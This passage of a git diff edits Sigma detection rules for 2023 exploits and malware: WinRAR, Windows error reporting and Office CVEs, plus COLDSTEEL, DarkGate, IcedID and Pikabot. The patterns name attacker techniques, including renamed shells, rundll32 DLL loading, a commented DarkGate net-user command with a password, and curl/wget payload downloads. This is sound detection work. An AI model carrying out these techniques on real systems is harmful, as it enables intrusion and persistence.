\MOVEitTransfer\wwwroot\human2.aspx.lnk - \MOVEitTransfer\wwwroot\human2.aspx + # Uncomment selection if you wanna threat hunt for additional artifacts + # selection_cmdline: + # TargetFilename|contains: ':\Windows\TEMP\' + # TargetFilename|endswith: '.cmdline' selection_compiled_asp: CreationUtcTime|startswith: - '2023-03- ' diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_report_creation.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_report_creation.yml index 5876767d4..e13c3439c 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_report_creation.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_report_creation.yml @@ -1,8 +1,7 @@ title: Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location id: 92389a99-5215-43b0-a09f-e334453b2ed3 status: experimental -description: Detects the creation of a "Report.wer" file in an uncommon folder structure. - This could be a sign of potential exploitation of CVE-2023-36874. +description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874. references: - https://github.com/Wh04m1001/CVE-2023-36874 - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/ @@ -25,6 +24,7 @@ detection: TargetFilename|endswith: \Report.wer filter_main_locations: TargetFilename|contains: + # Note: This list is non exhaustive. Use this as a start for hunting for suspicious folder report - \ReportArchive\AppCrash_ - \ReportArchive\AppHang_ - \ReportArchive\Critical_ diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_wermgr_creation.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_wermgr_creation.yml index f11130cdf..52ac70098 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_wermgr_creation.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_wermgr_creation.yml @@ -1,8 +1,7 @@ title: Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation id: ad0960eb-0015-4d16-be13-b3d9f18f1342 status: experimental -description: Detects the creation of a file named "wermgr.exe" being created in an - uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874. +description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874. references: - https://github.com/Wh04m1001/CVE-2023-36874 - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/ @@ -26,12 +25,12 @@ detection: filter_main_locations: TargetFilename|contains: - :\$WINDOWS.~BT\NewOS\ - - :\$WinREAgent\ + - :\$WinREAgent\ # From "wuauclt.exe" - :\Windows\servicing\LCU\ - :\Windows\System32\ - :\Windows\SysWOW64\ - :\Windows\WinSxS\ - - :\WUDownloadCache\ + - :\WUDownloadCache\ # Windows Update Download Cache condition: file_event and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml index 5ac79d83b..5cce5b95f 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml @@ -1,9 +1,7 @@ title: Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution id: 50dbc08b-60ce-40f1-a6b6-346497e34c88 status: experimental -description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" - binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" - in exploitation of CVE-2023-36874 +description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874 references: - https://github.com/Wh04m1001/CVE-2023-36874 - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/ diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36884/file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36884/file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml index b5b79d647..bfe5c9192 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36884/file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36884/file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml @@ -1,8 +1,7 @@ title: Potential CVE-2023-36884 Exploitation Dropped File id: 8023d3a2-dcdc-44da-8fa9-5c7906e55b38 status: experimental -description: Detects a specific file being created in the recent folder of Office. - These files have been seen being dropped during potential exploitations of CVE-2023-36884 +description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884 references: - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit - https://twitter.com/wdormann/status/1679184475677130755 diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml index 68eeb9f4e..3f670ea49 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml @@ -1,11 +1,10 @@ title: CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File id: e4556676-fc5c-4e95-8c39-5ef27791541f related: - - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 - type: similar + - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 + type: similar status: experimental -description: Detects the creation of a file with a double extension and a space by - WinRAR. This could be a sign of exploitation of CVE-2023-38331 +description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331 references: - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/ - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml index 055196c91..82ee0697c 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml @@ -1,11 +1,10 @@ title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 related: - - id: e4556676-fc5c-4e95-8c39-5ef27791541f - type: similar + - id: e4556676-fc5c-4e95-8c39-5ef27791541f + type: similar status: experimental -description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), - where an attacker can leverage WinRAR to execute arbitrary commands and binaries. +description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries. references: - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/ - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md @@ -27,19 +26,20 @@ detection: selection_parent: ParentImage|endswith: \WinRAR.exe selection_folder: - CommandLine|contains: \AppData\Local\Temp\Rar$ + CommandLine|contains: \AppData\Local\Temp\Rar$ selection_double_ext: - CommandLine|re: \.[a-zA-Z0-9]{1,4} \. + CommandLine|re: \.[a-zA-Z0-9]{1,4} \. selection_binaries: - - Image|endswith: - - \cmd.exe - - \wscript.exe - - OriginalFileName: - - Cmd.Exe - - cscript.exe - - PowerShell.EXE - - pwsh.dll - - wscript.exe + # Note: add additional binaries that the attacker might use + - Image|endswith: + - \cmd.exe + - \wscript.exe + - OriginalFileName: + - Cmd.Exe + - cscript.exe + - PowerShell.EXE + - pwsh.dll + - wscript.exe condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-40477/file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-40477/file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml index 9391ab643..f66c80f91 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-40477/file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-40477/file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml @@ -1,9 +1,7 @@ title: CVE-2023-40477 Potential Exploitation - .REV File Creation id: c3bd6c55-d495-4c34-918e-e03e8828c074 status: experimental -description: Detects the creation of ".rev" files by WinRAR. Could be indicative of - potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly - after creation or a WinRAR application crash. +description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash. references: - https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/ - https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC @@ -24,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: - - \explorer.exe + - \explorer.exe # When extracted via context menu - \WinRAR.exe TargetFilename|endswith: .rev condition: file_event and selection diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/proc_creation_win_exploit_other_win_server_undocumented_rce.yml b/sigma/sysmon/emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/proc_creation_win_exploit_other_win_server_undocumented_rce.yml index 39e94ba38..af1139dbb 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/proc_creation_win_exploit_other_win_server_undocumented_rce.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/proc_creation_win_exploit_other_win_server_undocumented_rce.yml @@ -1,8 +1,7 @@ title: Potential Exploitation Attempt Of Undocumented WindowsServer RCE id: 6d5b8176-d87d-4402-8af4-53aee9db7b5d status: test -description: Detects potential exploitation attempt of undocumented Windows Server - Pre Auth Remote Code Execution (RCE) +description: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE) references: - https://github.com/SigmaHQ/sigma/pull/3946 - https://twitter.com/hackerfantastic/status/1616455335203438592?s=20 @@ -24,8 +23,8 @@ detection: ParentImage|endswith: \svchost.exe Image|endswith: \svchost.exe ParentCommandLine|contains: -k DHCPServer - CommandLine|contains: -k DHCPServer - User|contains: + CommandLine|contains: -k DHCPServer + User|contains: # Covers many language settings for Network Service. Please expand. - NETWORK SERVICE - NETZWERKDIENST - SERVIZIO DI RETE diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_renamed_cmd.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_renamed_cmd.yml index 2f76f0942..0cd713162 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_renamed_cmd.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_renamed_cmd.yml @@ -1,8 +1,7 @@ title: Potential COLDSTEEL RAT File Indicators id: c708a93f-46b4-4674-a5b8-54aa6219c5fa status: experimental -description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" - directory. Seen being used by the COLDSTEEL RAT in some of its variants. +description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_service_dll_creation.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_service_dll_creation.yml index 738453768..f607c7d60 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_service_dll_creation.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_service_dll_creation.yml @@ -1,8 +1,7 @@ title: Potential COLDSTEEL Persistence Service DLL Creation id: 1fea93a2-1524-4a3c-9828-3aa0c2414e27 status: experimental -description: Detects the creation of a file in a specific location and with a specific - name related to COLDSTEEL RAT +description: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: X__Junior (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/image_load_malware_coldsteel_persistence_service_dll.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/image_load_malware_coldsteel_persistence_service_dll.yml index 443e11dbb..ffc04c7e8 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/image_load_malware_coldsteel_persistence_service_dll.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/image_load_malware_coldsteel_persistence_service_dll.yml @@ -1,11 +1,8 @@ title: Potential COLDSTEEL Persistence Service DLL Load id: 1d7a57da-02e0-4f7f-92b1-c7b486ccfed5 status: experimental -description: 'Detects a suspicious DLL load by an "svchost" process based on location - and name that might be related to ColdSteel RAT. This DLL location and name has - been seen used by ColdSteel as the service DLL for its persistence mechanism - - ' +description: | + Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml index dacfa3784..8cf1b7dc4 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml @@ -1,8 +1,7 @@ title: COLDSTEEL RAT Anonymous User Process Execution id: e01b6eb5-1eb4-4465-a165-85d40d874add status: experimental -description: Detects the creation of a process executing as user called "ANONYMOUS" - seen used by the "MileStone2016" variant of COLDSTEEL +description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_cleanup.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_cleanup.yml index 1e3bde239..aa8a42e10 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_cleanup.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_cleanup.yml @@ -1,9 +1,7 @@ title: COLDSTEEL RAT Cleanup Command Execution id: 88516f06-ebe0-47ad-858e-ae9fd060ddea status: experimental -description: Detects the creation of a "rundll32" process from the ColdSteel persistence - service to initiate the cleanup command by calling one of its own exports. This - functionality is not present in "MileStone2017" and some "MileStone2016" samples +description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: Nasreddine Bencherchali (Nextron Systems) @@ -27,7 +25,7 @@ detection: - ' -k msupdate2' - ' -k alg' Image|endswith: \rundll32.exe - CommandLine|contains: + CommandLine|contains: - UpdateDriverForPlugAndPlayDevicesW - ServiceMain - DiUninstallDevice diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml index 0e2b80b76..75ea8e099 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml @@ -1,8 +1,7 @@ title: COLDSTEEL RAT Service Persistence Execution id: 9f9cd389-cea0-4142-bf1a-a3fd424abedd status: experimental -description: Detects the creation of an "svchost" process with specific command line - flags, that were seen present and used by ColdSteel RAT +description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: X__Junior (Nextron Systems) @@ -21,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \svchost.exe - CommandLine|endswith: + CommandLine|endswith: - ' -k msupdate' - ' -k msupdate2' - ' -k alg' diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml index deb1fb9b0..166d884e9 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml @@ -1,8 +1,7 @@ title: Potential COLDSTEEL RAT Windows User Creation id: 95214813-4c7a-4a50-921b-ee5c538e1d16 status: experimental -description: Detects creation of a new user profile with a specific username, seen - being used by some variants of the COLDSTEEL RAT. +description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_binary_creation.yml b/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_binary_creation.yml index 3abaf07fe..54b1e0fec 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_binary_creation.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_binary_creation.yml @@ -1,18 +1,11 @@ title: DarkGate - Autoit3.EXE File Creation By Uncommon Process id: 1a433e1d-03d2-47a6-8063-ece992cf4e73 status: experimental -description: 'Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious - processes used to create Autoit3.exe. - - This activity has been associated with DarkGate malware, which uses Autoit3.exe - to execute shellcode that performs - - process injection and connects to the DarkGate command-and-control server. Curl, - KeyScramblerLogon, and these other - +description: | + Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. + This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs + process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable. - - ' references: - https://github.security.telekom.com/2023/08/darkgate-loader.html - https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware diff --git a/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml b/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml index 22bbcca59..9e3477021 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml @@ -1,15 +1,10 @@ title: DarkGate - Autoit3.EXE Execution Parameters id: f8e9aa1c-14f2-4dbd-aa59-b98968ed650d status: experimental -description: 'Detects execution of the legitimate Autoit3 utility from a suspicious - parent process. AutoIt3.exe is used within - - the DarkGate infection chain to execute shellcode that performs process injection - and connects to the DarkGate - +description: | + Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within + the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. - - ' references: - https://github.security.telekom.com/2023/08/darkgate-loader.html - https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware @@ -29,8 +24,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_proc: - - Image|endswith: \Autoit3.exe - - OriginalFileName: AutoIt3.exe + - Image|endswith: \Autoit3.exe + - OriginalFileName: AutoIt3.exe selection_parent: ParentImage|endswith: - \cmd.exe diff --git a/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml b/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml index 97877a6cb..639173004 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml @@ -1,8 +1,7 @@ title: DarkGate - User Created Via Net.EXE id: bf906d7b-7070-4642-8383-e404cf26eba5 status: experimental -description: Detects creation of local users via the net.exe command with the name - of "DarkGate" +description: Detects creation of local users via the net.exe command with the name of "DarkGate" references: - Internal Research author: X__Junior (Nextron Systems) @@ -17,6 +16,7 @@ logsource: category: process_creation product: windows detection: + # /c net user /add SafeMode DarkGate0! process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational @@ -24,7 +24,7 @@ detection: Image|endswith: - \net.exe - \net1.exe - CommandLine|contains|all: + CommandLine|contains|all: - user - add - DarkGate diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml b/sigma/sysmon/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml index 69ebcdbb9..43b811a72 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml @@ -1,8 +1,7 @@ title: Griffon Malware Attack Pattern id: bcc6f179-11cd-4111-a9a6-0fab68515cf7 status: experimental -description: Detects process execution patterns related to Griffon malware as reported - by Kaspersky +description: Detects process execution patterns related to Griffon malware as reported by Kaspersky references: - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \local\temp\ - //b /e:jscript - .txt diff --git a/sigma/sysmon/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml b/sigma/sysmon/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml index 1100af5a6..669f4efd6 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml @@ -1,9 +1,7 @@ title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 id: 2bd8e100-5b3b-4b6a-bbb5-b129d3ddddc5 status: experimental -description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with - the export function "DllRegisterServer". This behaviour was often seen used by - malware and especially IcedID +description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID references: - https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/ - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ @@ -23,9 +21,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \rundll32.exe - CommandLine|endswith: - - \1.dll, DllRegisterServer - - ' 1.dll, DllRegisterServer' + CommandLine|endswith: + - \1.dll, DllRegisterServer # In case of full path exec + - ' 1.dll, DllRegisterServer' # In case of direct exec condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/net_connection_win_malware_pikabot_rundll32_activity.yml b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/net_connection_win_malware_pikabot_rundll32_activity.yml index 610e78d22..524016fab 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/net_connection_win_malware_pikabot_rundll32_activity.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/net_connection_win_malware_pikabot_rundll32_activity.yml @@ -1,13 +1,9 @@ title: Potential Pikabot C2 Activity - Suspicious Process Created By Rundll32.EXE id: cae6cee6-0244-44d2-84ed-e65f548eb7dc status: experimental -description: 'Detects the execution of rundll32 that leads to an external network - connection. - - The malware Pikabot has been seen to use this technique to initiate C2-communication - through hard-coded Windows binaries. - - ' +description: | + Detects the execution of rundll32 that leads to an external network connection. + The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries. references: - https://www.virustotal.com/gui/file/d72af640b71b8e3eca3eba660dd7c7f029ff8852bcacaa379e7b6c57cf4d9b44 author: Andreas Braathen (mnemonic.io) @@ -20,9 +16,7 @@ tags: logsource: product: windows category: network_connection - definition: 'Requirements: By default the network_connection type event might - not contain the ParentImage. Make sure you collect such fields in order to - use this rule' + definition: 'Requirements: By default the network_connection type event might not contain the ParentImage. Make sure you collect such fields in order to use this rule' detection: network_connection: EventID: 3 @@ -30,6 +24,7 @@ detection: selection: ParentImage|endswith: \rundll32.exe Image|endswith: + # Note: Only add processes seen used by Pikabot to avoid collision with other strains of malware - \searchprotocolhost.exe - \sndvol.exe - \wermgr.exe diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml index 52c9fa5c0..b6bc629fb 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml @@ -1,18 +1,10 @@ title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE id: e5144106-8198-4f6e-bfc2-0a551cc8dd94 status: experimental -description: 'Detects the execution of concatenated commands via "cmd.exe". Pikabot - often executes a combination of multiple commands via the command handler "cmd - /c" in order to download and execute additional payloads. - - Commands such as "curl", "wget" in order to download extra payloads. "ping" and - "timeout" are abused to introduce delays in the command execution and "Rundll32" - is also used to execute malicious DLL files. - - In the observed Pikabot infections, a combination of the commands described above - are used to orchestrate the download and execution of malicious DLL files. - - ' +description: | + Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. + Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. + In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files. references: - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt - 